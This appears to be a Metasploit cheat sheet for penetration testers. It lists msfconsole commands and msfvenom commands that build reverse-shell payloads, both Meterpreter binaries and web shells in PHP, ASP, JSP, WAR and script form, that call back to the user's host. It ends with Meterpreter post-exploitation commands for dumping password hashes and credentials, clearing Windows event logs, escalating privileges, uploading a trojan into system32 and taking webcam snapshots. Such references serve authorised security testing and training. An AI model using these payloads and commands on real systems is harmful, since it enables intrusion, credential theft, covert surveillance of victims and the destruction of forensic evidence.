Metasploit Cheatsheet
Last updated
Was this helpful?
Last updated
Was this helpful?
searchsploit <search>
searchsploit -x <file.txt> msfconsole -h #usage options
msf > help
msf > <command> -h
msf > help search
connect <ip> <port> #netcat like
edit #edit the current module
grep <http> search <oracle> #match output containing the string âhttpâ from a search for modules containing the string âoracleâ
info
load <plugin> #load plugin
unload <plugin> #unload plugin
route <add/remove> <subnet> <netmask> <session_id> #allows you to route sockets through a session or âcommâ, providing basic pivoting capabilities
route flush #remove all routes
route print #show all active routes
search name:mysql
search type:post
search cve:2011 author:jduck platform:linux
background
sessions -l #list sessions
sessions -i 1 #interact with session 1
set <rhost> <ip> #configure options for the current module
unset <rhost> #remove a parameter
unset all # remove all parameters
setg <rhost> <ip> #set global variables
unsetg #unset global variables
save #after setting your different variables, you can run the save command to save your current environment and settings
show <auxiliary/exploits/...>
show options
show advanced #more options
show payloads
show targets
show encoders #useful in exploit development when you arenât quite certain as to which payload encoding methods will work with a given exploit.
show nops #display nop generators
show evasion
use <module/module_id>
back
banner
check #see if the target is vulnerable, not often support
color
exit
irb #drop into a live Ruby interpreter shell
jobs #Jobs are modules that are running in the background. The jobs command provides the ability to list and terminate these jobs.
kill <0> #kill job 0
loadpath #load a third-part module tree for the path so you can point Metasploit at your 0-day exploits, encoders, payloads, etc.
resource <karma.rc> #runs resource (batch) files that can be loaded through msfconsole.
exploit -j # run in the background### List payloads ###
msfvenom -l
### Binaries ###
## Linux ##
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
## Windows ##
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
## Mac ##
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
### Web Payloads ###
## PHP ##
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
## ASP ##
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
## ASPX ##
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx
## JSP ##
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
## WAR ##
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
### Scripting Payloads ###
## Python ##
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
## Bash ##
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
## Perl ##
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
### Shellcode ###
#For all shellcode see âmsfvenom âhelp-formatsâ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
## Linux Based Shellcode ##
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
## Windows Based Shellcode ##
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
## Mac Based Shellcode ##
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>use exploit/multi/handler
post/multi/manage/shell_to_meterpreter
help
background
clearev #clear the application, system and security logs on windows system
download <c:\\boot.ini> #use double-slashes
edit <file.txt> #use vim
execute -f <cmd.exe> -i -H #runs a command on the target
getuid #display the user running on the host
hashdump #dump SAM database
idletime #display time that the user at the remote machine has been idle
ipconfig
lpwd & lcd #change apply in local, not on the remote host
sysinfo
getsystem #to try priviledges escalation
ps
migrate <1832> #change current ps to ps 1832 to escalade (run post/windows/manage/migrate)
resource <resource.txt> #call a file with meterpreter instructions
search -f <autoexec.bat> #locate specific file
search -f <sea*.bat> <c:\\xamp\\>
shell #standard shell on the target system
upload <trojan.exe> <c:\\windows\\sytem32> #use double-slashes
webcam_list
webcam_snap
load <python/kiwi/...>
creds_all